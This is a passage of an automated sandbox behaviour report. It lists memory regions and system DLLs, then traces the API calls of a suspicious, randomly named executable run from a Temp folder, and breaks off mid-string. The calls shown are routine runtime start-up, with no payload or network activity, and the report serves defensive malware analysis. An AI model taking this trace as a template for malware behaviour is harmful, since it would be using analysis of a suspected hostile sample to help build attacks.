0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1326 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1327 start_va = 0x679a0000 end_va = 0x679c2fff monitored = 0 entry_point = 0x679a8940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 1328 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1329 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1330 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1331 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1332 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1333 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1334 start_va = 0x890000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1335 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1336 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1337 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1338 start_va = 0x688a0000 end_va = 0x68931fff monitored = 0 entry_point = 0x688add60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1339 start_va = 0x67c50000 end_va = 0x67c67fff monitored = 0 entry_point = 0x67c53f70 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\SysWOW64\\msacm32.dll" (normalized: "c:\\windows\\syswow64\\msacm32.dll") Region: id = 1340 start_va = 0x671b0000 end_va = 0x671f0fff monitored = 0 entry_point = 0x671be050 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\SysWOW64\\resutils.dll" (normalized: "c:\\windows\\syswow64\\resutils.dll") Region: id = 1353 start_va = 0x67020000 end_va = 0x6709bfff monitored = 0 entry_point = 0x670428b0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\SysWOW64\\clusapi.dll" (normalized: "c:\\windows\\syswow64\\clusapi.dll") Region: id = 1354 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1361 start_va = 0x707f0000 end_va = 0x7080ffff monitored = 0 entry_point = 0x707fd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1362 start_va = 0x707c0000 end_va = 0x707ebfff monitored = 0 entry_point = 0x707dbb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1378 start_va = 0x9d0000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1379 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1380 start_va = 0xa90000 end_va = 0xc17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1383 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1384 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1385 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1386 start_va = 0xc20000 end_va = 0xda0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1387 start_va = 0xdb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1388 start_va = 0x1100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 1392 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1393 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1394 start_va = 0x480000 end_va = 0x481fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui") Region: id = 1402 start_va = 0x9d0000 end_va = 0xa60fff monitored = 0 entry_point = 0xa08cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1403 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1405 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1406 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1407 start_va = 0x9d0000 end_va = 0xa05fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1425 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1426 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1431 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1432 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1454 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1455 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1457 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1458 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1461 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1463 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1536 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1537 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1629 start_va = 0xf30000 end_va = 0x10a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1631 start_va = 0x2500000 end_va = 0x267afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Thread: id = 53 os_tid = 0x1210 [0188.729] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0188.730] GetProcessHeap () returned 0x4d0000 [0189.212] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74f30000 [0189.212] GetProcAddress (hModule=0x74f30000, lpProcName="FlsAlloc") returned 0x74f4a980 [0189.212] GetProcAddress (hModule=0x74f30000, lpProcName="FlsFree") returned 0x74f54ff0 [0189.212] GetProcAddress (hModule=0x74f30000, lpProcName="FlsGetValue") returned 0x74f47570 [0189.212] GetProcAddress (hModule=0x74f30000, lpProcName="FlsSetValue") returned 0x74f49e30 [0189.212] GetProcAddress (hModule=0x74f30000, lpProcName="InitializeCriticalSectionEx") returned 0x74f56740 [0189.212] GetProcAddress (hModule=0x74f30000, lpProcName="CreateEventExW") returned 0x74f566a0 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="CreateSemaphoreExW") returned 0x74f56700 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadStackGuarantee") returned 0x74f4b040 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="CreateThreadpoolTimer") returned 0x74f4ace0 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadpoolTimer") returned 0x77bd7dc0 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77be4010 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="CloseThreadpoolTimer") returned 0x77be2a50 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="CreateThreadpoolWait") returned 0x74f4a7b0 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadpoolWait") returned 0x77be2290 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="CloseThreadpoolWait") returned 0x77be2910 [0189.213] GetProcAddress (hModule=0x74f30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c07a60 [0189.214] GetProcAddress (hModule=0x74f30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77bfac00 [0189.214] GetProcAddress (hModule=0x74f30000, lpProcName="GetCurrentProcessorNumber") returned 0x77bea890 [0189.214] GetProcAddress (hModule=0x74f30000, lpProcName="GetLogicalProcessorInformation") returned 0x74f4ac80 [0189.214] GetProcAddress (hModule=0x74f30000, lpProcName="CreateSymbolicLinkW") returned 0x74f70830 [0189.214] GetProcAddress (hModule=0x74f30000, lpProcName="SetDefaultDllDirectories") returned 0x76c06270 [0189.215] GetProcAddress (hModule=0x74f30000, lpProcName="EnumSystemLocalesEx") returned 0x74f4fe80 [0189.215] GetProcAddress (hModule=0x74f30000, lpProcName="CompareStringEx") returned 0x74f4ff80 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetDateFormatEx") returned 0x74f70e00 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetLocaleInfoEx") returned 0x74f4a750 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetTimeFormatEx") returned 0x74f71240 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetUserDefaultLocaleName") returned 0x74f4ad60 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="IsValidLocaleName") returned 0x74f71460 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="LCMapStringEx") returned 0x74f49a10 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetCurrentPackageId") returned 0x76b8ded0 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetTickCount64") returned 0x74f43630 [0189.216] GetProcAddress (hModule=0x74f30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0189.217] GetProcAddress (hModule=0x74f30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0189.217] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3bc) returned 0x4ec140 [0189.217] GetCurrentThreadId () returned 0x1210 [0189.217] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x18) returned 0x4ea7c8 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x800) returned 0x4ed650 [0189.218] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x10dede1, hStdOutput=0xa3267561, hStdError=0x10de9d7)) [0189.218] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0189.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0189.218] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0189.218] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" [0189.218] GetEnvironmentStringsW () returned 0x4ede58* [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xc18) returned 0x4eea78 [0189.218] FreeEnvironmentStringsW (penv=0x4ede58) returned 1 [0189.218] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10ef208, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe")) returned 0x2f [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xc6) returned 0x4e8e00 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x9c) returned 0x4e1880 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3e) returned 0x4e2c28 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x5c) returned 0x4e0290 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x6e) returned 0x4e4df8 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x78) returned 0x4decb0 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4e55d8 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x28) returned 0x4ef960 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4e1b58 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4df788 [0189.218] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x50) returned 0x4e30f0 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4dacc0 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3a) returned 0x4e2cb8 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4e2038 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2a) returned 0x4e3d00 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4e3d70 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1c) returned 0x4dace8 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a2) returned 0x4e3680 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x7c) returned 0x4df958 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x36) returned 0x4e7d20 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3a) returned 0x4e2910 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x90) returned 0x4e0100 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4ef870 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x30) returned 0x4e3f30 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x36) returned 0x4e7da0 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4e0470 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x52) returned 0x4df5e8 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c) returned 0x4e2d00 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xd6) returned 0x4e4ce0 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4e3c90 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x28) returned 0x4ef8a0 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1e) returned 0x4dad38 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2c) returned 0x4e3cc8 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4df3b8 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x52) returned 0x4df558 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4efa50 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x42) returned 0x4d6e70 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2c) returned 0x4e3a60 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x44) returned 0x4d6f90 [0189.219] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4efa20 [0189.220] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4eea78 | out: hHeap=0x4d0000) returned 1 [0189.221] GetLastError () returned 0x0 [0189.221] SetLastError (dwErrCode=0x0) [0189.221] GetLastError () returned 0x0 [0189.221] SetLastError (dwErrCode=0x0) [0189.221] GetLastError () returned 0x0 [0189.221] SetLastError (dwErrCode=0x0) [0189.221] GetACP () returned 0x4e4 [0189.221] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x220) returned 0x4e3280 [0189.221] GetLastError () returned 0x0 [0189.221] SetLastError (dwErrCode=0x0) [0189.221] IsValidCodePage (CodePage=0x4e4) returned 1 [0189.221] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0189.221] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0189.221] GetLastError () returned 0x0 [0189.221] SetLastError (dwErrCode=0x0) [0189.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0189.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0189.221] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0189.221] GetLastError () returned 0x0 [0189.221] SetLastError (dwErrCode=0x0) [0189.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0189.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0189.222] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0189.222] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0189.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 